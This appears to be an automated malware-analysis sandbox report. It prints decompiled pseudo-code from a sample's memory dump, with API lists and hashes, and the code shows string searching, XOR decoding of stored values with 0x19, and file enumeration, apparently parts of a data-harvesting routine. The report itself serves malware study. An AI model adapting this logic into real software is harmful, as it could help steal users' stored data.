    					E00419D9D(0x92,  &_v628);
    					E00419D9D(0x93,  &_v620);
    					E00419D9D(0x94,  &_v576);
    					__eflags = _v640;
    					if(_v640 == 0) {
    						L30:
    						E004119C1(_v640);
    						E004119DD(_v652, _v656);
    						goto L31;
    					}
    					_v644 = 0;
    					__eflags = _v648;
    					if(_v648 <= 0) {
    						goto L30;
    					}
    					do {
    						_t168 = _v644;
    						_t103 = _v652;
    						__eflags =  *(_t103 + _t168 * 4);
    						if( *(_t103 + _t168 * 4) == 0) {
    							goto L29;
    						}
    						_v664 = StrStrIA( *(_t103 + _t168 * 4),  &_v588);
    						_t157 = StrStrIA( *(_v656 + _t168 * 4),  &_v632);
    						_v668 = StrStrIA( *(_v660 + _t168 * 4),  &_v628);
    						_t114 = StrStrIA( *(_v664 + _t168 * 4),  &_v588);
    						__eflags = _v676;
    						_t169 = _t114;
    						if(_v676 == 0) {
    							goto L29;
    						}
    						__eflags = _v672;
    						if(_v672 == 0) {
    							goto L29;
    						}
    						__eflags = _t169;
    						if(_t169 == 0) {
    							goto L29;
    						}
    						_v676 =  &(_v676[8]);
    						_v672 =  &(_v672[6]);
    						_t170 =  &(_t169[0xa]);
    						_v652 = _t170;
    						E0040F058();
    						E0040F058();
    						E0040F058();
    						__eflags = _t157;
    						if(_t157 == 0) {
    							L16:
    							_t158 = 0x15;
    							__eflags =  *_v676;
    							if( *_v676 == 0) {
    								goto L29;
    							}
    							__eflags =  *_v672;
    							if( *_v672 == 0) {
    								goto L29;
    							}
    							_t123 =  *_t170;
    							__eflags = _t123;
    							if(_t123 == 0) {
    								goto L29;
    							}
    							__eflags = _t123 - 0x30;
    							if(_t123 == 0x30) {
    								L22:
    								__eflags = _t170[0];
    								if(_t170[0] == 0) {
    									goto L29;
    								}
    								L23:
    								_t124 = 0;
    								__eflags =  *_t170;
    								if( *_t170 == 0) {
    									goto L29;
    								} else {
    									goto L24;
    								}
    								do {
    									L24:
    									_t124[_t170] = _t124[_t170] ^ 0x00000019;
    									_t124 =  &(_t124[1]);
    									__eflags = _t124[_t170];
    								} while (_t124[_t170] != 0);
    								__eflags = _t124;
    								if(_t124 > 0) {
    									_t171 =  &_v580;
    									_t125 = 0x57;
    									E00419DD3(_t125,  &_v580);
    									_push(_t158);
    									_push(_v676);
    									_t159 = _v656;
    									_push(_v652);
    									_push(_v672);
    									_t148 = 0x311;
    									_t128 = E004126B4(_t171, 0x311, _v656, _t171);
    									_t176 = _t176 + 0x14;
    									__eflags = _t128;
    									if(_t128 > 0) {
    										_t172 = _a4;
    										_t129 = E00411DB5(_t128, _t172, _t159);
    										__eflags = _t129;
    										if(_t129 != 0) {
    											_t70 = _t172 + 4;
    											 *_t70 =  &(( *(_t172 + 4))[1]);
    											__eflags =  *_t70;
    										}
    									}
    								}
    								goto L29;
    							}
    							__eflags = _t123 - 0x31;
    							if(_t123 != 0x31) {
    								goto L23;
    							}
    							goto L22;
    						}
    						_v648 =  &(_t157[6]);
    						E0040F058();
    						_t133 = E00412040(_v648,  &_v588, 0);
    						_t162 = _t133;
    						__eflags = _t162 - 1;
    						if(_t162 < 1) {
    							goto L16;
    						}
    						__eflags = _t162 - 0xffff;
    						 *_t133 =  *_t133 + 1;
    						_t56 =  &(_t170[0]);
    						 *_t56 =  &(_t170[0][_t148]);
    						__eflags =  *_t56;
    						L29:
    						_v644 = _v644 + 1;
    						__eflags = _v644 - _v648;
    					} while (_v644 < _v648);
    					goto L30;
    				} else {
    					_t173 =  &_v612;
    					E00419DD3(0x90, _t173);
    					_v648 = _t173;
    					E004170EA( &_v524,  &_v648, _t179, 1, 5, E0040F072, _a4, 0, 0, 0);
    					goto L32;
    				}
    			}















































    APIs
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040F198
    • StrStrIA.SHLWAPI(?,?), ref: 0040F1AA
    • StrStrIA.SHLWAPI(?,?), ref: 0040F1BA
    • StrStrIA.SHLWAPI(?,?), ref: 0040F1CC
      • Part of subcall function 004170EA: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
      • Part of subcall function 004170EA: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
      • Part of subcall function 004170EA: PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
      • Part of subcall function 004170EA: Sleep.KERNEL32(00000000,?,?), ref: 004171F7
      • Part of subcall function 004170EA: FindNextFileW.KERNEL32(?,?), ref: 00417225
      • Part of subcall function 004170EA: FindClose.KERNEL32(?), ref: 00417237
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
    • String ID:
    • API String ID: 1075381090-0
    • Opcode ID: db4a474ad041ab4b6ce82ee6af083014292bd34684c1e18fb6a7feb4f6a43f51
    • Instruction ID: 3682acbdcad571997d0be667af768df34394ab2d48154ca1c0a0f2b0f3fca791
    • Opcode Fuzzy Hash: db4a474ad041ab4b6ce82ee6af083014292bd34684c1e18fb6a7feb4f6a43f51
    • Instruction Fuzzy Hash: CE7179355083419FC720EB25C801B9FB7E5AB89704F04097FF894A7692D779ED4ACB8A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041D022(intOrPtr _a4) {
    				intOrPtr _v8;
    				void* __esi;
    				void* _t13;
    				signed short _t26;
    				void* _t37;
    
    				_t37 = E00412510(_a4);
    				if(_t37 > 0x3e8) {
    					EnterCriticalSection(0x424010);
    					E004119C1( *0x424004);
    					 *0x424004 =  *0x424004 & 0x00000000;
    					 *0x42400c = 0;
    					LeaveCriticalSection(0x424010);
    					return 0;
    				}
    				EnterCriticalSection(0x424010);
    				_t26 = ( *0x42400c & 0x0000ffff) + _t37;
    				if(_t26 <= 0x3e8) {
    					_t13 = E0041194C(_t26 + _t26, 0x424004);
    					if(_t13 != 0) {
    						_t13 = E004119FD( *0x424004 + ( *0x42400c & 0x0000ffff) * 2, _a4, _t37 + _t37);
    						 *0x42400c = _t26;
    					}
    				} else {
    					_t13 = E0041194C(0x7d0, 0x424004);
    					if(_t13 != 0) {
    						E004119FD( *0x424004,  *0x424004 + (( *0x42400c & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + 0x3e8 - _t37);
    						_t13 = E004119FD(0x3e8 - _t37 + 0x3e8 - _t37 +  *0x424004, _v8, _t37 + _t37);
    						 *0x42400c = 0x3e8;
    					}
    				}
    				LeaveCriticalSection(0x424010);
    				return _t13;
    			}









    APIs
    • EnterCriticalSection.KERNEL32(00424010,?,?,?,0041D315,?), ref: 0041D03F
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    • LeaveCriticalSection.KERNEL32(00424010,?,?,?,0041D315,?), ref: 0041D060
    • EnterCriticalSection.KERNEL32(00424010,?,?,?,?,0041D315,?), ref: 0041D071
    • LeaveCriticalSection.KERNEL32(00424010,?,?,?,0041D315,?), ref: 0041D10A
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$FreeHeap
    • String ID:
    • API String ID: 1946732658-0
    • Opcode ID: dfb84f3d850489091a13ab81f7491ca700607ae590e634629e120d3d3b18b305
    • Instruction ID: 02c96cbfca19508d39190bcffc2ad04c35170359e84d8274d1aaff415282f949
    • Opcode Fuzzy Hash: dfb84f3d850489091a13ab81f7491ca700607ae590e634629e120d3d3b18b305
    • Instruction Fuzzy Hash: DE2180B1600115EBC724AFA5ED94ABA37A8EF8430CB40513BF70197172DB3958C6DB6D
    Uniqueness

    Uniqueness Score: -1.00%